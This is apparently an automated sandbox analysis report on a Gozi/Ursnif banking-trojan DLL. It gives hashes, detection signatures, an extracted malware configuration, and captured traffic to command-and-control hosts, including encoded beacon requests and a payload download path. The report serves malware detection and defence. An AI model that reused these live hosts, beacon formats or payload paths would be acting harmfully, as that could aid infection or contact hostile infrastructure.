Analysis Report SecuriteInfo.com.BScope.TrojanBanker.IcedID.13045

Overview

General Information

Sample Name: SecuriteInfo.com.BScope.TrojanBanker.IcedID.13045 (renamed file extension from 13045 to dll)
Analysis ID: 355490
MD5: a98649743626d197b440755061b1aac3
SHA1: 8033ebd201645f713fb4ad48bf92e5da26bc8216
SHA256: f30b3f53f613d953680fdde8faf35c96a25a1136d0dd6c7aab1cc14ee908702c
Tags: Gozi

Most interesting Screenshot:

Detection

Gozi Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected Gozi e-Banking trojan
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected Ursnif
Allocates memory in foreign processes
Compiles code for process injection (via .Net compiler)
Creates a thread in another existing process (thread injection)
Hooks registry keys query functions (used to hide registry keys)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the export address table of user mode modules (user mode EAT hooks)
Modifies the import address table of user mode modules (user mode IAT hooks)
Modifies the prolog of user mode functions (user mode inline hooks)
Sigma detected: MSHTA Spawning Windows Shell
Suspicious powershell command line found
Writes registry values via WMI
Writes to foreign memory regions
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file does not import any functions
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for the Microsoft Outlook file path
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection:

barindex
Antivirus detection for URL or domain
Source: http://c56.lepini.at/jvassets/xI/t64.datings Avira URL Cloud: Label: phishing
Found malware configuration
Source: rundll32.exe.4880.1.memstr Malware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_17134_x64", "version": "250180", "uptime": "181", "system": "8c34453f67a8cfe0dea5c01f31a0c919hh-", "size": "202820", "crc": "2", "action": "00000000", "id": "2200", "time": "1613790327", "user": "f73be0088695dc15e71ab15cc8e7488a", "hash": "0xf751eb91", "soft": "3"}
Multi AV Scanner detection for domain / URL
Source: c56.lepini.at Virustotal: Detection: 8% Perma Link
Source: api3.lepini.at Virustotal: Detection: 10% Perma Link
Source: api10.laptok.at Virustotal: Detection: 10% Perma Link
Multi AV Scanner detection for submitted file
Source: SecuriteInfo.com.BScope.TrojanBanker.IcedID.dll Virustotal: Detection: 21% Perma Link

Compliance:

barindex
Uses 32bit PE files
Source: SecuriteInfo.com.BScope.TrojanBanker.IcedID.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Uses new MSVCR Dlls
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll Jump to behavior
Binary contains paths to debug symbols
Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 00000020.00000002.440174527.0000025637660000.00000002.00000001.sdmp, csc.exe, 00000022.00000002.449830180.000002835CB50000.00000002.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000024.00000000.480563169.0000000006560000.00000002.00000001.sdmp
Source: Binary string: ntdll.pdb source: rundll32.exe, 00000001.00000003.464838911.0000000006880000.00000004.00000001.sdmp
Source: Binary string: c:\FatSchool\syllableLetter\HuntMouth\ResultMount\Metal.pdb source: loaddll32.exe, 00000000.00000002.474041669.000000006E4F4000.00000002.00020000.sdmp, SecuriteInfo.com.BScope.TrojanBanker.IcedID.dll
Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000001.00000003.464838911.0000000006880000.00000004.00000001.sdmp
Source: Binary string: rundll32.pdb source: control.exe, 00000025.00000002.475364095.00000234DE54C000.00000004.00000040.sdmp
Source: Binary string: rundll32.pdbGCTL source: control.exe, 00000025.00000002.475364095.00000234DE54C000.00000004.00000040.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000024.00000000.480563169.0000000006560000.00000002.00000001.sdmp
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_032E3512 Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 1_2_032E3512
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_06004CF1 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 1_2_06004CF1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_06015518 wcscpy,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 1_2_06015518
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_0600834C RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 1_2_0600834C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_0600B88D lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 1_2_0600B88D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_060016E1 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 1_2_060016E1

Networking:

barindex
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at
Source: global traffic HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: GOOGLE-AS-APGoogleAsiaPacificPteLtdSG GOOGLE-AS-APGoogleAsiaPacificPteLtdSG
Source: global traffic HTTP traffic detected: GET /api1/lRuXDeqB_2Bc/XvlsjNkb12o/gwuZFBZ1reBnRN/MwDD30RutxcHLukN9rpn9/npm0S1bymAWDLwAq/sSrh6nrcB30L_2F/izKhwPXgoMPbDw8AwI/bcxbPx_2F/sPE_2F9KStlAhqTF4V5b/y4C6N5Yt6P6BPPOxWQU/OGLJLzSobh_2B0sjZCp_2F/DrvPoP9aSd0Pf/rb0_2BEP/NEaBXrAH5a59GVRi35npZ2u/2HVSB5mOu5/GjNc1aS2g_2Friv0u/PdviQBpuxewp/654QJEVjE1l/tqM_2FQyyccPpl/OvxU5bjYeNf_2FSFZWNT_/2BXxJQTeWkl/B26Z HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /api1/52JoIUxZl8uL8g/Jlv9SsgDyw540Wq6LwGS5/Akl7wfo7sQpZNdRY/cjXr0_2FffzKq5M/LLRxJgTq1LatxpQ4rq/e_2Fc6vld/dlUg3_2FZQ0ehGT4So8G/fMy2GT6nt6deO5e25_2/Ff0JiPPfiqmM34f5OWLQvg/KYp9KrJh0r67L/pn5QNIOf/kMWRvPMFc9r9kXODRg1ulU2/z7odHXGBMR/lYfmaULcgNQgPx4am/cS2bXQrCZF_2/B23CtBYMqES/4DTxnAolsdVLPO/ddtMaT_2FHc7z3PMSjVwg/UA6RKmWTWJJFW3tn/HIFqSc0CgE9Oz8U/RMsU3xQiPj/0lNR7s2U HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /api1/mJcu4ZpSHvJcxs/gTaeMeLA_2FWkDrPos3yv/o_2FkT7lhbTkz94i/fBpDzU1tcyY6OmN/wh_2Fqsq0x_2BVcyRu/hKNYQUf5c/2_2FFXvnTSY3WFoMID9n/_2F6Bbwi_2B4k052_2B/Wr5N3KWbYMdVd6GR_2BEd6/frQD5QyUG4NTH/KCXhDtaI/LQzs7_2BhqKT7yFro_2FbyT/VIlUFlqLO5/zPoVUlcpnwFahHZhS/NgHMqvKCx6Md/QpmRmASOulk/3KXyMSMLXtwHJ0/Ayj0bGv0dcW2jNr68db4N/OxsA4fzXWiBGnk2x/RKSr4_2F7Vbgdhx/3Qe5dCnv674qW96yc4/mbzhfuMNA/DIB HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at
Source: global traffic HTTP traffic detected: GET /api1/KdItNYP92K_2BGFJRG/FCes9fXP6/EKH8rknsTZpgqZdJldqw/3b9dm14MUM_2B8EMGSI/7pfw2RywZcbIKG9NkPZ6rU/L_2F1iZVmuA8I/bZCf7wPT/59CIAbsuvFsGBr_2ByvNsJY/_2F8CnY_2F/Qz4L32M090vQj6JXa/h6No_2BwGiDr/i_2BcbOUuIA/99cCf3a5n6QYR9/qLuOWT5N_2FpMeyoZyiR_/2BPh75eFbRwqS7wb/9mmFbiL_2BjLH_2/Bw0aMox3zZYN8BrWji/d0ul9u66b/5Ar2TaNyvuxbIv_2FbJO/iZdpEvv6dL67JT4JuHG/CIG3_2B0w/ezBI HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0Host: api3.lepini.at
Source: global traffic HTTP traffic detected: GET /api1/vWkJGuJE0Ypz4ELElXNYpx/ievwRvWRp6AtE/FLqmCUzt/5uo9iTuyNQHW_2Bgl72Mtoc/OJjks7D84c/jUQzCvj9HAvA4_2Fn/0IgtjZWkkpM9/mugU4KqOZpX/ELHTOesIuFyu2R/fPF1D_2FKLK8pIgLUPJ8b/MsAkkR2vVU550mz4/2xNIT9yeFYP0SH8/QCAO7xgxjSKhjDwWSu/d4RDhkHVo/swuiJsofHs6pC25dK6l3/HzIzoU7jbR0_2FxK9PH/dXkkvhT3hIXDJCOq2yuAle/hm5AJy_2FYrqX/EHbCXHlP/QMEn6CeIiMAtfbE_2BItId6/8cRyHuVByX/s_2FZEQQg/t HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /api1/Nwf1NrCXPxFirOr0/uMxCmKw0yJ8Me4y/orydykHO8XvuJC2OYB/s7Uq9EcWB/rEU1Bs_2FE38t41ILq_2/BLnFpSQmWR07RbE9l3_/2F7qFMxOvjfOZ3Wk5kh8d_/2FSq1zGohLPY7/rV1YYz1u/bg5hb76H1d9lPRJ2QkA7rOK/CzjsM_2Bpl/4Tr8l66uq_2F0z5aY/B6OoutaRjYCr/vft5NoB1Vtt/gZ1VtWrzMHi7Qd/_2FJa1O_2B51q_2Fi9e0F/9zlCZ_2Fg1KAymcn/ZnA4yi7CxnTLTPI/Xusdx3Oaio4z6sFjkd/Hl0nRXuIj/kLcz6KJ9ikRLyD1DMiLc/55hUFdugyYd/ehM HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /api1/b_2BsRZ0V3/9XA_2FQDJiqIrvxT_/2Bzr5nCmqGSK/ShqTR3djQTg/9okoIzbrA45DgN/9_2BnAmX4aa3sOT_2Fjtg/wGfQ9GmpK7SG_2FZ/Jm_2Bu2uDtvBBiy/YdPpa1IDFr0YVFiCIU/9kpIGh2av/Hp7TJNKAwdyzbdIX2lq0/_2FLAYbWp0p17KILF16/gSpFWzNIu2P1GhKVwKLBMS/JBNwDitSRAHK2/4FJoV5D8/N70d4vmik_2BJY6NS2Abb4g/od_2FcoJz_/2BCjrYc2TYSJ6kyyC/h8EY_2Bk0tWz/YrJjDZ2_2Bq/x6uK3S6lfJQGsn/0gdeblP7aJv/qe HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at
Source: global traffic HTTP traffic detected: GET /api1/MAC288CXvx/CqE_2FjFttZgFxzTr/MiARq1YU3Ozj/cO5nvYd1QZ1/9pP5tjMqhWzKxQ/4Fo_2FlvUMfZR_2B6lME7/5rcSbRaprs2L63pj/ODg2Z6FLC7qglee/4_2Fk4pRcK6CoYb5H6/4ED5a34fC/FOE8o4kQepcFxnvsdyvs/5oUTPwL2esoyhQYMEtl/0473GEiPK1QvkIo4bwkLYq/JhStBUtEP6iki/nGPvtQkv/kuGeGooyGp9BZWCtnT06knF/ZgoZr_2F5L/6SdySCav5X7udnSBS/_2F_2B8xtq_2/BGO6I65Acz9/Ko7NuIbnR/Immw_2BnO/I HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0Host: api3.lepini.at
Source: global traffic HTTP traffic detected: GET /api1/QsdQ9bwnxSOH1/x55zfc3o/j8BfIHUCdwyUtYZFgBqFl8X/_2BFwtf_2F/QdLOKZB9TNZsN7wvI/vobkXML_2B8c/sYZxphtC1aK/FLvOclZiXjQYOG/x5IaE7pOnih7q_2BrqmEb/egNoiSna00Kb6meB/wCzvKPOaVph51X8/xUkuRKEycofy4z_2Bl/5ilyf6ti8/f3G6tY3BMx_2BC48fFfc/OMRrOfQP_2FoyZv3x5c/mBeNmAfD4fjZh3wiudEAuV/MfCWeHQQB11zh/ND3yzaR1/SNDEufrq_2FC3x6B7XUhRUl/mw4VFuO8kI0ykyRa6MM/y41I HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0Host: api3.lepini.at
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: unknown DNS traffic detected: queries for: api10.laptok.at
Source: unknown HTTP traffic detected: POST /api1/7l8Dzjsp1/mXsJaM5_2F8Vehw_2BWy/W2IjJ85rxt75hrAokHG/TJ0QxGdBxL3u8DIp94_2BF/9KwvYHm_2BYSs/BfajRvyD/2MOW_2BQiedgr_2Fd8hxOAg/4ITYhYiB2o/YxcRWa76OaPgbHiid/oLaZ6rVxKHz9/_2B0DP9hiSI/LwZPk_2FktvyHp/45tIfIOgi7g5V2ypH5k4K/BaUY8Ny1I4ubY51x/HVluRDHgx9QZrYK/A8s3_2BcDuftJ4p3cS/pxjey9cHz/IRMztldXNqbinunnNW7T/V01D57bubow_2FdlHkl/Kzth8j0U_2FloaabiqRg_2/B_2Bb2W HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0Content-Length: 2Host: api3.lepini.at
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 19 Feb 2021 18:05:26 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
Source: explorer.exe, 00000024.00000000.477235518.0000000006100000.00000002.00000001.sdmp String found in binary or memory: http://%s.com
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://amazon.fr/
Source: {785970B2-7328-11EB-90E4-ECF4BB862DED}.dat.21.dr String found in binary or memory: http://api10.laptok.at/api1/52JoIUxZl8uL8g/Jlv9SsgDyw540Wq6LwGS5/Akl7wfo7sQpZNdRY/cjXr0_2FffzKq5M/LL
Source: {785970B0-7328-11EB-90E4-ECF4BB862DED}.dat.21.dr, ~DF4A349C0270E318E7.TMP.21.dr String found in binary or memory: http://api10.laptok.at/api1/lRuXDeqB_2Bc/XvlsjNkb12o/gwuZFBZ1reBnRN/MwDD30RutxcHLukN9rpn9/npm0S1bymA
Source: loaddll32.exe, 00000000.00000002.473604486.0000000001600000.00000002.00000001.sdmp, explorer.exe, 00000024.00000000.458041713.0000000001980000.00000002.00000001.sdmp, control.exe, 00000025.00000002.473939310.00000234DCB90000.00000002.00000001.sdmp String found in binary or memory: http://api10.laptok.at/api1/mJcu4ZpSHvJcxs/gTaeMeLA_2FWkDrPos3yv/o_2FkT7lhbTkz94i/fBpDzU1tcyY6O
Source: {785970B4-7328-11EB-90E4-ECF4BB862DED}.dat.21.dr, ~DFB35D4E79E851C9A1.TMP.21.dr String found in binary or memory: http://api10.laptok.at/api1/mJcu4ZpSHvJcxs/gTaeMeLA_2FWkDrPos3yv/o_2FkT7lhbTkz94i/fBpDzU1tcyY6OmN/wh
Source: explorer.exe, 00000024.00000002.504777682.0000000005603000.00000004.00000001.sdmp String found in binary or memory: http://api10.laptok.at/api1/vWkJGuJE0Ypz4ELElXNYpx/ievwRvWRp6AtE/FLqmCUzt/5uo9iTuyNQHW_2Bgl72Mtoc/OJ
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 00000024.00000000.477235518.0000000006100000.00000002.00000001.sdmp String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 00000024.00000002.494453261.0000000001464000.00000004.00000020.sdmp String found in binary or memory: http://c56.lepini.at/e3
Source: explorer.exe, 00000024.00000002.494453261.0000000001464000.00000004.00000020.sdmp, explorer.exe, 00000024.00000000.486779764.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://c56.lepini.at/jvassets/xI/t64.dat
Source: explorer.exe, 00000024.00000000.486779764.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://c56.lepini.at/jvassets/xI/t64.datings
Source: explorer.exe, 00000024.00000002.494453261.0000000001464000.00000004.00000020.sdmp String found in binary or memory: http://c56.lepini.at/l
Source: explorer.exe, 00000024.00000000.487000468.00000000089C7000.00000004.00000001.sdmp String found in binary or memory: http://c56.lepini.at:80/jvassets/xI/t64.dat:
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: rundll32.exe, powershell.exe, 0000001C.00000003.454320398.00000221ED090000.00000004.00000001.sdmp, explorer.exe, 00000024.00000000.479277351.00000000062EE000.00000004.00000001.sdmp, control.exe, 00000025.00000002.470708873.000000000051E000.00000004.00000001.sdmp String found in binary or memory: http://constitution.org/usdeclar.txt
Source: rundll32.exe, 00000001.00000002.483192314.0000000006000000.00000040.00000001.sdmp, powershell.exe, 0000001C.00000003.454320398.00000221ED090000.00000004.00000001.sdmp, explorer.exe, 00000024.00000000.479277351.00000000062EE000.00000004.00000001.sdmp, control.exe, 00000025.00000002.470708873.000000000051E000.00000004.00000001.sdmp String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: explorer.exe, 00000024.00000000.488894525.000000000F540000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://espanol.search.yahoo.com/
